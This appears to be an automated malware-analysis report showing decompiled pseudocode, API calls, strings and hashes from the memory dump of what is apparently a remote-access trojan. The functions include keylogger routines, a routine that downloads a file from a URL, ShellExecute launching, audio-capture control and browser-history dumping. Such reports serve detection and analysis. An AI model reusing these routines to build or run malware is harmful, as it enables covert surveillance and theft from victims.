											_t95 = _t98 + 0xc;
											asm("stosd");
											asm("stosd");
											asm("stosd");
											L36:
											E00447044(_t78, _t91, _t95, _t98, _t98);
											L37:
											__eflags = 0;
										}
									}
								}
							}
						}
						goto L39;
					}
					L00431F00(_t94, _t98 + 0x18, _t94, 0x101);
					_t54 = _v32 * 0x30;
					__eflags = _t54;
					_v36 = _t54;
					_t55 = _t54 + 0x46a498;
					_v32 = _t55;
					do {
						__eflags =  *_t55;
						_t82 = _t55;
						if( *_t55 != 0) {
							while(1) {
								_t62 = _t82[1];
								__eflags = _t62;
								if(_t62 == 0) {
									break;
								}
								_t92 =  *_t82 & 0x000000ff;
								_t63 = _t62 & 0x000000ff;
								while(1) {
									__eflags = _t92 - _t63;
									if(_t92 > _t63) {
										break;
									}
									__eflags = _t92 - 0x100;
									if(_t92 < 0x100) {
										_t31 = _t94 + 0x46a480; // 0x8040201
										 *(_t98 + _t92 + 0x19) =  *(_t98 + _t92 + 0x19) |  *_t31;
										_t92 = _t92 + 1;
										__eflags = _t92;
										_t63 = _t82[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t82 =  &(_t82[2]);
								__eflags =  *_t82;
								if( *_t82 != 0) {
									continue;
								}
								break;
							}
							_t55 = _v32;
						}
						_t94 = _t94 + 1;
						_t55 = _t55 + 8;
						_v32 = _t55;
						__eflags = _t94 - 4;
					} while (_t94 < 4);
					 *(_t98 + 4) = _t78;
					 *(_t98 + 8) = 1;
					 *(_t98 + 0x21c) = L00446F2E(_t78);
					_t83 = _t98 + 0xc;
					_t91 = _v36 + 0x46a48c;
					_t95 = 6;
					do {
						_t58 =  *_t91;
						_t91 = _t91 + 2;
						 *_t83 = _t58;
						_t83 = _t83 + 2;
						_t95 = _t95 - 1;
						__eflags = _t95;
					} while (_t95 != 0);
					goto L36;
				} else {
					L00446FDF(_t98);
				}
				L39:
				return L0042FD1B(_v8 ^ _t99);
			}

0x004473a1
0x004473a8
0x004473b0
0x004473b8
0x004473bd
0x004473ce
0x004473ce
0x004473d0
0x004473d2
0x004473d4
0x004473d7
0x004473d7
0x004473dd
0x00000000
0x00000000
0x004473e3
0x004473e4
0x004473e7
0x004473ea
0x004473ef
0x00000000
0x004473f1
0x004473f1
0x004473f7
0x004474c5
0x004473fd
0x004473fd
0x00447403
0x00000000
0x00447409
0x0044740d
0x00447413
0x00447415
0x00000000
0x0044741b
0x0044741b
0x00447420
0x00447426
0x00447428
0x004474b2
0x004474b8
0x00000000
0x004474ba
0x004474bb
0x00000000
0x004474bb
0x0044742e
0x00447438
0x0044743d
0x00447445
0x0044744b
0x0044744c
0x0044744f
0x004474a2
0x00447451
0x00447451
0x00447455
0x00447458
0x0044745a
0x0044745a
0x0044745d
0x0044745f
0x00000000
0x00000000
0x00447461
0x00447464
0x0044746f
0x0044746f
0x00447471
0x00000000
0x00000000
0x00447469
0x0044746e
0x0044746e
0x0044746e
0x00447473
0x00447476
0x00447479
0x00000000
0x00000000
0x00000000
0x00447479
0x0044745a
0x0044747b
0x0044747b
0x0044747e
0x00447483
0x00447483
0x00447486
0x00447487
0x00447487
0x00447487
0x00447497
0x0044749d
0x0044749d
0x004474a7
0x004474aa
0x004474ab
0x004474ac
0x00447570
0x00447571
0x00447576
0x00447577
0x00447577
0x00447428
0x00447415
0x00447403
0x004473f7
0x00000000
0x00447579
0x004474d7
0x004474df
0x004474df
0x004474e3
0x004474e6
0x004474ec
0x004474ef
0x004474ef
0x004474f2
0x004474f4
0x004474f6
0x004474f6
0x004474f9
0x004474fb
0x00000000
0x00000000
0x004474fd
0x00447500
0x0044751c
0x0044751c
0x0044751e
0x00000000
0x00000000
0x00447505
0x0044750b
0x0044750d
0x00447513
0x00447517
0x00447517
0x00447518
0x00000000
0x00447518
0x00000000
0x0044750b
0x00447520
0x00447523
0x00447526
0x00000000
0x00000000
0x00000000
0x00447526
0x00447528
0x00447528
0x0044752b
0x0044752c
0x0044752f
0x00447532
0x00447532
0x00447538
0x0044753b
0x0044754a
0x00447553
0x00447558
0x0044755e
0x0044755f
0x0044755f
0x00447562
0x00447565
0x00447568
0x0044756b
0x0044756b
0x0044756b
0x00000000
0x004473bf
0x004473c0
0x004473c6
0x0044757a
0x00447589

APIs

Part of subcall function 00446F6C: GetOEMCP.KERNEL32(00000000,?,?,004471F5,?), ref: 00446F97

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044723A,?,00000000), ref: 0044740D
GetCPInfo.KERNEL32(00000000,:rD,?,?,?,0044723A,?,00000000), ref: 00447420

Strings

:rD, xrefs: 0044741B, 0044741E

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: CodeInfoPageValid
String ID: :rD
API String ID: 546120528-3120900009
Opcode ID: e7dd486a7158d532bde09d9e7db95788a91d24dc14596c43e70085922fabfaec
Instruction ID: 614f5d5ef064064d7ec38ea7b35d3f5f756231f868e2d753d05d5f6cbb9767d4
Opcode Fuzzy Hash: e7dd486a7158d532bde09d9e7db95788a91d24dc14596c43e70085922fabfaec
Instruction Fuzzy Hash: 65513370A086059EFB20CF35C8816BBBFA5EF41304F14406FD0868B251E73D9947CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00447044, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00447044(void* __ebx, signed int __edx, void* __edi, void* __esi, char _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				intOrPtr _v1824;
				signed int _v1828;
				signed int _t63;
				void* _t67;
				signed int _t68;
				intOrPtr _t69;
				void* _t72;
				char _t73;
				char _t74;
				signed char _t75;
				signed int _t76;
				signed char _t86;
				char _t87;
				char _t90;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				void* _t96;
				char* _t97;
				intOrPtr _t101;
				signed int _t102;

				_t95 = __edx;
				_t63 =  *0x46a00c; // 0x1e1e4200
				_v8 = _t63 ^ _t102;
				_t2 =  &_a4; // 0x447576
				_t101 =  *_t2;
				if(GetCPInfo( *(_t101 + 4),  &_v1820) == 0) {
					_t96 = _t101 + 0x119;
					_t90 = 0;
					_t67 = 0xffffff9f;
					_t68 = _t67 - _t96;
					__eflags = _t68;
					_v1828 = _t68;
					do {
						_t97 = _t96 + _t90;
						_t69 = _t68 + _t97;
						_v1824 = _t69;
						__eflags = _t69 + 0x20 - 0x19;
						if(_t69 + 0x20 > 0x19) {
							__eflags = _v1824 - 0x19;
							if(_v1824 > 0x19) {
								 *_t97 = 0;
							} else {
								_t72 = _t101 + _t90;
								_t57 = _t72 + 0x19;
								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
								__eflags =  *_t57;
								_t59 = _t90 - 0x20; // -32
								_t73 = _t59;
								goto L24;
							}
						} else {
							 *(_t101 + _t90 + 0x19) =  *(_t101 + _t90 + 0x19) | 0x00000010;
							_t54 = _t90 + 0x20; // 0x20
							_t73 = _t54;
							L24:
							 *_t97 = _t73;
						}
						_t68 = _v1828;
						_t96 = _t101 + 0x119;
						_t90 = _t90 + 1;
						__eflags = _t90 - 0x100;
					} while (_t90 < 0x100);
				} else {
					_t74 = 0;
					do {
						 *((char*)(_t102 + _t74 - 0x104)) = _t74;
						_t74 = _t74 + 1;
					} while (_t74 < 0x100);
					_t75 = _v1814;
					_t93 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t108 = _t75;
						if(_t75 == 0) {
							break;
						}
						_t95 =  *(_t93 + 1) & 0x000000ff;
						_t76 = _t75 & 0x000000ff;
						while(1) {
							__eflags = _t76 - _t95;
							if(_t76 > _t95) {
								break;
							}
							__eflags = _t76 - 0x100;
							if(_t76 < 0x100) {
								 *((char*)(_t102 + _t76 - 0x104)) = 0x20;
								_t76 = _t76 + 1;
								__eflags = _t76;
								continue;
							}
							break;
						}
						_t93 = _t93 + 2;
						__eflags = _t93;
						_t75 =  *_t93;
					}
					E004493AC(0, _t95, 0x100, _t101, _t108, 0, 1,  &_v264, 0x100,  &_v1800,  *(_t101 + 4), 0);
					E0044480C(0x100, _t101, _t108, 0,  *((intOrPtr*)(_t101 + 0x21c)), 0x100,  &_v264, 0x100,  &_v520, 0x100,  *(_t101 + 4), 0);
					E0044480C(0x100, _t101, _t108, 0,  *((intOrPtr*)(_t101 + 0x21c)), 0x200,  &_v264, 0x100,  &_v776, 0x100,  *(_t101 + 4), 0);
					_t94 = 0;
					do {
						_t86 =  *(_t102 + _t94 * 2 - 0x704) & 0x0000ffff;
						if((_t86 & 0x00000001) == 0) {
							__eflags = _t86 & 0x00000002;
							if((_t86 & 0x00000002) == 0) {
								 *((char*)(_t101 + _t94 + 0x119)) = 0;
							} else {
								_t37 = _t101 + _t94 + 0x19;
								 *_t37 =  *(_t101 + _t94 + 0x19) | 0x00000020;
								__eflags =  *_t37;
								_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x304));
								goto L15;
							}
						} else {
							 *(_t101 + _t94 + 0x19) =  *(_t101 + _t94 + 0x19) | 0x00000010;
							_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x204));
							L15:
							 *((char*)(_t101 + _t94 + 0x119)) = _t87;
						}
						_t94 = _t94 + 1;
					} while (_t94 < 0x100);
				}
				return L0042FD1B(_v8 ^ _t102);
			}

0x00447044
0x0044704f
0x00447056
0x0044705b
0x0044705b
0x00447078
0x00447170
0x00447176
0x00447178
0x00447179
0x00447179
0x0044717b
0x00447181
0x00447181
0x00447183
0x00447185
0x0044718e
0x00447191
0x0044719d
0x004471a4
0x004471b4
0x004471a6
0x004471a6
0x004471a9
0x004471a9
0x004471a9
0x004471ad
0x004471ad
0x00000000
0x004471ad
0x00447193
0x00447193
0x00447198
0x00447198
0x004471b0
0x004471b0
0x004471b0
0x004471b6
0x004471bc
0x004471c2
0x004471c3
0x004471c3
0x0044707e
0x0044707e
0x00447080
0x00447080
0x00447087
0x00447088
0x0044708c
0x00447092
0x00447098
0x004470c0
0x004470c0
0x004470c2
0x00000000
0x00000000
0x004470a1
0x004470a5
0x004470b7
0x004470b7
0x004470b9
0x00000000
0x00000000
0x004470aa
0x004470ac
0x004470ae
0x004470b6
0x004470b6
0x00000000
0x004470b6
0x00000000
0x004470ac
0x004470bb
0x004470bb
0x004470be
0x004470be
0x004470da
0x004470fb
0x00447123
0x0044712b
0x0044712d
0x0044712d
0x00447137
0x00447147
0x00447149
0x00447160
0x0044714b
0x0044714b
0x0044714b
0x0044714b
0x00447150
0x00000000
0x00447150
0x00447139
0x00447139
0x0044713e
0x00447157
0x00447157
0x00447157
0x00447167
0x00447168
0x0044716c
0x004471d7

APIs

GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 00447069

Strings

, xrefs: 004470AE
vuD, xrefs: 0044705B

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: Info
String ID: $vuD
API String ID: 1807457897-1530330280
Opcode ID: 3f1def9f96a58cc15d1bbc526656efa8d46c329ab04edfec503587d68abf9c7b
Instruction ID: 92fcf1547ebdf66eb0b87621d9a8ff62090b57e6ee7fe94dbbcc2872a12e2c7f
Opcode Fuzzy Hash: 3f1def9f96a58cc15d1bbc526656efa8d46c329ab04edfec503587d68abf9c7b
Instruction Fuzzy Hash: 9641F9705082489FEF258E64CC84BF7BBB9DB55308F2404EEE58A87242D3399E46DF65

Uniqueness

Uniqueness Score: -1.00%

Function 0040414D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93
sleepCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040414D(void* __ebx) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				short _v692;
				void* __edi;
				WCHAR* _t40;
				struct HINSTANCE__* _t81;
				struct HINSTANCE__* _t84;
				void* _t85;

				_t48 = __ebx;
				_t81 = 0;
				GetModuleFileNameW(0,  &_v692, 0x104);
				E004020D5(__ebx,  &_v52);
				E0041800F( &_v28, 0x30, L00401F95(E00417093( &_v76)));
				E00401FC7();
				L00401F95(0x46c1a0);
				E0041432B(L00401EEB(E004030A6(_t48,  &_v100, E00404429(_t48,  &_v124, E00404405(_t48,  &_v148,  &_v692, 0, E0040427F(__ebx,  &_v172, L" /sort \"Visit Time\" /stext \"")), 0,  &_v28), 0, 0, "\"")));
				L00401EF0();
				L00401EF0();
				L00401EF0();
				L00401EF0();
				_t84 = 0;
				while(1) {
					_t40 = L00401EEB( &_v28);
					_t80 =  &_v52;
					if(E004179DC(_t40,  &_v52) != 0) {
						break;
					}
					Sleep(0xfa);
					_t84 =  &(_t84->i);
					if(_t84 < 0x14) {
						continue;
					} else {
					}
					L5:
					L00401EF0();
					E00401FC7();
					return _t81;
				}
				E004020EC(_t48, _t85 - 0x18,  &_v52, __eflags,  &_v52);
				_push(0x9d);
				E00404AA4(_t48, 0x46c138, _t80, __eflags);
				_t81 = 1;
				__eflags = 1;
				goto L5;
			}

0x0040414d
0x00404164
0x00404167
0x00404170
0x0040418a
0x00404193
0x0040419d
0x004041f1
0x004041f9
0x00404201
0x0040420c
0x00404217
0x0040421c
0x0040421e
0x00404221
0x00404226
0x00404232
0x00000000
0x00000000
0x00404239
0x0040423f
0x00404243
0x00000000
0x00000000
0x00404245
0x00404267
0x0040426a
0x00404272
0x0040427e
0x0040427e
0x00404250
0x00404255
0x0040425f
0x00404266
0x00404266
0x00000000

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404167

Part of subcall function 00417093: GetCurrentProcessId.KERNEL32(00000000,74B5FBB0,00000000,?,?,?,?,?,0040AEF2,.vbs), ref: 004170BA

Part of subcall function 0041432B: CloseHandle.KERNEL32( _@,00000004,00405F20,?,00000000,00000000), ref: 00414341
Part of subcall function 0041432B: CloseHandle.KERNEL32(?), ref: 0041434A

Part of subcall function 004179DC: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,00000000,00000000,?,004136FE), ref: 004179F9

Sleep.KERNEL32(000000FA,0045F464), ref: 00404239

Strings

/sort "Visit Time" /stext ", xrefs: 004041B3

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
String ID: /sort "Visit Time" /stext "
API String ID: 368326130-1573945896
Opcode ID: c8b4856186dacc37877c82338587a1852c50972c42d9ba46998ad8dab6c3d146
Instruction ID: 7061a5f3a0732a34bedf69b2f97f4882e16be89ee39d0e7819724232ed9fbdaa
Opcode Fuzzy Hash: c8b4856186dacc37877c82338587a1852c50972c42d9ba46998ad8dab6c3d146
Instruction Fuzzy Hash: CB316371A102185BCB14FAB5DC969EE77769F90308F40007FB906775E2EF38194ACA99

Uniqueness

Uniqueness Score: -1.00%

Function 00412A86, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60
sleepfilenetworkCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00412A86(void* __ebx, void* __edx, void* __ebp, char _a8, char _a12, char _a16, char _a28, void* _a108, void* _a132) {
				char _v4;
				intOrPtr* _t12;
				void* _t14;
				void* _t18;
				void* _t27;
				void* _t44;
				void* _t51;
				void* _t55;

				L0:
				_t44 = __edx;
				_t27 = __ebx;
				Sleep(0x64);
				_t55 =  *0x46bd6c - _t27; // 0x0
				if(_t55 != 0) {
					goto L0;
				}
				_t12 = L00401F95(L00401E49( &_a16, _t44, _t55, 0));
				_t14 = L00401F95(L00401E49( &_a12, _t44, _t55, 1));
				_t45 =  *_t12;
				E0041805B( &_a28,  *_t12, _t14);
				_t18 = L00401F95(L00401E49( &_a8,  *_t12, _t55, 2));
				__imp__URLDownloadToFileW(0, _t18, L00401EEB( &_a28), 0, 0);
				_t56 = _t18;
				if(_t18 == 0) {
					E00407350(0, _t51 - 0x18, _t45, _t56,  &_a16);
					E0040B0E2();
				}
				L00401EF0();
				_t8 =  &_v4; // 0x404538
				L00401E74(_t8, _t45);
				E00401FC7();
				E00401FC7();
				return 0;
			}

0x00412a86
0x00412a86
0x00412a86
0x00412a88
0x00412a8e
0x00412a94
0x00000000
0x00000000
0x00412aa4
0x00412ab8
0x00412abd
0x00412ac4
0x00412ae3
0x00412aea
0x00412af0
0x00412af2
0x00412b02
0x00412b07
0x00412b0c
0x0041318d
0x004133c4
0x004133c8
0x004133d4
0x004133e0
0x004133ed

APIs

Sleep.KERNEL32(00000064), ref: 00412A88
URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 00412AEA

Strings

8E@, xrefs: 004133C4

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: DownloadFileSleep
String ID: 8E@
API String ID: 1931167962-787191786
Opcode ID: db8b163adeee467a52107c5d9de6461a9580d3235546e05431231a1ed8e2a0a9
Instruction ID: 026e37eaac6a7f0be5a6f47ff2f6c220693f67fdfc1424ac955b23e6f862d316
Opcode Fuzzy Hash: db8b163adeee467a52107c5d9de6461a9580d3235546e05431231a1ed8e2a0a9
Instruction Fuzzy Hash: 661186715043015BD614FF72D8569BF7399AF54309F00083FF946A61E2EF389948C65A

Uniqueness

Uniqueness Score: -1.00%

Function 004095A9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E004095A9(void* __ebx, struct HHOOK__** __ecx) {
				char _v28;
				void* __edi;
				struct HHOOK__** _t27;
				void* _t28;

				_t17 = __ebx;
				_t27 = __ecx;
				if( *((char*)(__ecx + 0x49)) == 0) {
					__eflags = 0;
					return 0;
				}
				_t33 =  *0x46a9d4 - 0x32;
				_t26 = "Offline Keylogger Stopped";
				if( *0x46a9d4 != 0x32) {
					E00402084(__ebx,  &_v28, "Offline Keylogger Stopped");
					_t28 = _t28 - 0x18;
					E004172DA(_t28,  &_v28);
					E00409634(__ebx, _t27, _t33);
					E00401FC7();
				}
				_t29 = _t28 - 0x18;
				E00402084(_t17, _t28 - 0x18, _t26);
				E00402084(_t17, _t29 - 0x18, "[Info]");
				L00416C80(_t17, _t26);
				_t27[0x12] = 0;
				if(_t27[0x12] == 0 &&  *_t27 != 0) {
					UnhookWindowsHookEx( *_t27);
					 *_t27 =  *_t27 & 0x00000000;
				}
				return 1;
			}

0x004095a9
0x004095b0
0x004095b7
0x0040962c
0x00000000
0x0040962c
0x004095b9
0x004095c0
0x004095c5
0x004095cb
0x004095d0
0x004095d8
0x004095df
0x004095e7
0x004095e7
0x004095ec
0x004095f2
0x00409601
0x00409606
0x0040960e
0x00409616
0x0040961f
0x00409625
0x00409625
0x00000000

APIs

UnhookWindowsHookEx.USER32(?), ref: 0040961F

Part of subcall function 00409634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 00409642
Part of subcall function 00409634: wsprintfW.USER32 ref: 004096C3
Part of subcall function 00409634: SetEvent.KERNEL32(?,00000000), ref: 004096ED

Strings

Offline Keylogger Stopped, xrefs: 004095C0, 004095C7, 004095F1
[Info], xrefs: 004095FC

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: EventHookLocalTimeUnhookWindowswsprintf
String ID: Offline Keylogger Stopped$[Info]
API String ID: 2949427887-1791908007
Opcode ID: 401e296d5ca654c2970b2b3bb8dcd657e39c2b4926fc386e29e92b6c915f74fd
Instruction ID: 9efaed4a8ef81a290ad5d268e4fe3922035fbc03e5cccf55ce25ae16395c1a9d
Opcode Fuzzy Hash: 401e296d5ca654c2970b2b3bb8dcd657e39c2b4926fc386e29e92b6c915f74fd
Instruction Fuzzy Hash: 0D01B531A0460157DB297729D80B7BE7BA54B42305F44057FD981222D3EABE0D5AC7DF

Uniqueness

Uniqueness Score: -1.00%

Function 004425B3, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E004425B3(void* __ecx, void* __esi, void* __eflags, char _a4) {
				signed int _v8;
				signed int _t5;
				intOrPtr* _t18;
				signed int _t20;

				_t13 = __ecx;
				_push(__ecx);
				_t5 =  *0x46a00c; // 0x1e1e4200
				_v8 = _t5 ^ _t20;
				_push(__esi);
				_t18 = L00441F97(0x15, "IsValidLocaleName", 0x4590e0, "IsValidLocaleName");
				if(_t18 == 0) {
					_t3 =  &_a4; // 0x43e33f
					IsValidLocale(E00442708(_t13, _t18, __eflags,  *_t3, 0), 1);
				} else {
					_t2 =  &_a4; // 0x43e33f
					 *0x453474( *_t2);
					 *_t18();
				}
				return L0042FD1B(_v8 ^ _t20);
			}

0x004425b3
0x004425b8
0x004425b9
0x004425c0
0x004425c3
0x004425da
0x004425e1
0x004425f6
0x004425ff
0x004425e3
0x004425e3
0x004425e8
0x004425ee
0x004425ee
0x00442613

APIs

IsValidLocale.KERNEL32(00000000,?C,00000000,00000001,?,?,0043E33F,?,?,0043DD1F,?,00000004), ref: 004425FF

Strings

?C, xrefs: 004425F6, 004425E3
IsValidLocaleName, xrefs: 004425C4, 004425CE

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: LocaleValid
String ID: ?C$IsValidLocaleName
API String ID: 1901932003-3626571907
Opcode ID: d1d8c5253a1af981cfd3e37de039cb3b4bc27b4a035ec99b902d66c65b304dd4
Instruction ID: 0f43182f0e06842afc615407eccca0477f3e303412cdda621fdba0a01c3862c5
Opcode Fuzzy Hash: d1d8c5253a1af981cfd3e37de039cb3b4bc27b4a035ec99b902d66c65b304dd4
Instruction Fuzzy Hash: 92F05230680718B7DB216F209C02FAEBB64DB04B52F90402BFC016B2C2DEBD5E05958D

Uniqueness

Uniqueness Score: -1.00%

Function 00409B11, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E00409B11(void* __ebx, void* __ecx) {
				void* _t4;
				void* _t7;
				void* _t10;
				signed int _t12;
				void* _t13;
				void* _t17;
				void* _t18;

				_t10 = __ebx;
				_t17 = __ecx;
				_t12 = GetKeyState(0x11) & 0x0000ffff;
				_t4 =  *((intOrPtr*)(_t17 + 0x4c)) - 0xa4;
				if(_t4 == 0) {
					_t13 = _t18 - 0x18;
					_push("[AltL]");
					L6:
					E00402084(_t10, _t13);
					return E00408B59(_t17);
				}
				_t7 = _t4 - 1;
				if(_t7 == 0) {
					if(_t12 == 0) {
						_t13 = _t18 - 0x18;
						_push("[AltR]");
						goto L6;
					}
					return _t7;
				} else {
					E004089BA(_t17, _t18 - 0x18);
					return E00408B80(_t17);
				}
			}

0x00409b11
0x00409b14
0x00409b1c
0x00409b22
0x00409b27
0x00409b56
0x00409b58
0x00409b5d
0x00409b5d
0x00000000
0x00409b64
0x00409b29
0x00409b2c
0x00409b45
0x00409b4a
0x00409b4c
0x00000000
0x00409b4c
0x00409b6a
0x00409b2e
0x00409b34
0x00409b41
0x00409b41

APIs

GetKeyState.USER32(00000011), ref: 00409B16

Part of subcall function 004089BA: GetForegroundWindow.USER32(00000000,?,00000000), ref: 004089EE
Part of subcall function 004089BA: GetWindowThreadProcessId.USER32(00000000,?), ref: 004089F9
Part of subcall function 004089BA: GetKeyboardLayout.USER32 ref: 00408A00
Part of subcall function 004089BA: GetKeyState.USER32(00000010), ref: 00408A0A
Part of subcall function 004089BA: GetKeyboardState.USER32(?), ref: 00408A17
Part of subcall function 004089BA: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00408A33

Part of subcall function 00408B80: SetEvent.KERNEL32(?,?,?,?,00409CFC,?,?,?,?,?,00000000), ref: 00408BAD

Strings

[AltL], xrefs: 00409B58
[AltR], xrefs: 00409B4C

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
String ID: [AltL]$[AltR]
API String ID: 3195419117-2658077756
Opcode ID: 233eeff81a11d1e0ef41f110e07776e11a9ad604124f7dffc3698ee59377735f
Instruction ID: 2a395f7e7ec9595130e68cde229813fbdc3430fa116e23059516ea087cae5920
Opcode Fuzzy Hash: 233eeff81a11d1e0ef41f110e07776e11a9ad604124f7dffc3698ee59377735f
Instruction Fuzzy Hash: 57E0652130062197C858363E7A2B76E3C219B827B5B40016FF9866B6C7DD7EAD4543CF

Uniqueness

Uniqueness Score: -1.00%

Function 00412777, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00412777(void* __edx, void* __ebp, void* __eflags, char _a16, void* _a128, void* _a152) {

				_t19 = __edx;
				ShellExecuteW(0, L"open", L00401F95(L00401E49( &_a16, __edx, __eflags, 0)), 0, 0, 1);
				_t2 =  &_a16; // 0x404538
				L00401E74(_t2, _t19);
				E00401FC7();
				E00401FC7();
				return 0;
			}

0x00412777
0x00412795
0x004133c4
0x004133c8
0x004133d4
0x004133e0
0x004133ed

APIs

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 00412795

Strings

8E@, xrefs: 004133C4
open, xrefs: 0041278F

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: ExecuteShell
String ID: 8E@$open
API String ID: 587946157-2601783919
Opcode ID: 4a174233fad1308712026915405e2748d4c3bbd23a7c6193313af7554f161b63
Instruction ID: a3a45966c527cb9039505bdf36bed85c4dc8a7f97c1c46fe52c99c9ff6feb995
Opcode Fuzzy Hash: 4a174233fad1308712026915405e2748d4c3bbd23a7c6193313af7554f161b63
Instruction Fuzzy Hash: 86E092712083445BD204FA72DC81EBFB398AB50309F00083FB906A10E2EF385D0C866A

Uniqueness

Uniqueness Score: -1.00%

Function 00409B6B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E00409B6B(void* __ebx, void* __ecx) {
				void* _t4;
				void* _t7;
				signed int _t9;
				void* _t10;
				void* _t12;
				void* _t13;

				_t7 = __ebx;
				_t12 = __ecx;
				_t9 = GetKeyState(0x12) & 0x0000ffff;
				_t4 =  *((intOrPtr*)(_t12 + 0x4c)) - 0xa2;
				if(_t4 == 0) {
					if(_t9 == 0) {
						_t10 = _t13 - 0x18;
						_push("[CtrlL]");
						goto L5;
					}
				} else {
					_t4 = _t4 - 1;
					if(_t4 == 0) {
						_t10 = _t13 - 0x18;
						_push("[CtrlR]");
						L5:
						E00402084(_t7, _t10);
						return E00408B59(_t12);
					}
				}
				return _t4;
			}

0x00409b6b
0x00409b6e
0x00409b76
0x00409b7c
0x00409b81
0x00409b97
0x00409b9c
0x00409b9e
0x00000000
0x00409b9e
0x00409b83
0x00409b83
0x00409b86
0x00409b8b
0x00409b8d
0x00409ba3
0x00409ba3
0x00000000
0x00409baa
0x00409b86
0x00409bb0

APIs

GetKeyState.USER32(00000012), ref: 00409B70

Strings

[CtrlL], xrefs: 00409B9E
[CtrlR], xrefs: 00409B8D

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: State
String ID: [CtrlL]$[CtrlR]
API String ID: 1649606143-2446555240
Opcode ID: 64742ad456815e448cec770cc028005fb44021ec5766c216196dc85abf317472
Instruction ID: c7d76ad8b2f91347b64eca3d28aa0764e40cca804d3340b3ca60eca204a5aa27
Opcode Fuzzy Hash: 64742ad456815e448cec770cc028005fb44021ec5766c216196dc85abf317472
Instruction Fuzzy Hash: 61E048212102115BC514353AA61A67939209741775B40013FE982AB5C7C96F6D1542CB

Uniqueness

Uniqueness Score: -1.00%

Function 004129DA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E004129DA(void* __eax, void* __ebp, void* __eflags, char _a12, void* _a124, void* _a148) {
				void* _t16;

				 *0x46ba74 = 1;
				waveInStop(??);
				waveInClose( *0x46bab8);
				_t1 =  &_a12; // 0x404538
				L00401E74(_t1, _t16);
				E00401FC7();
				E00401FC7();
				return 0;
			}

0x004129df
0x004129e6
0x004129f2
0x004133c4
0x004133c8
0x004133d4
0x004133e0
0x004133ed

APIs

waveInStop.WINMM ref: 004129E6
waveInClose.WINMM ref: 004129F2

Strings

8E@, xrefs: 004133C4

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: wave$CloseStop
String ID: 8E@
API String ID: 3638528417-787191786
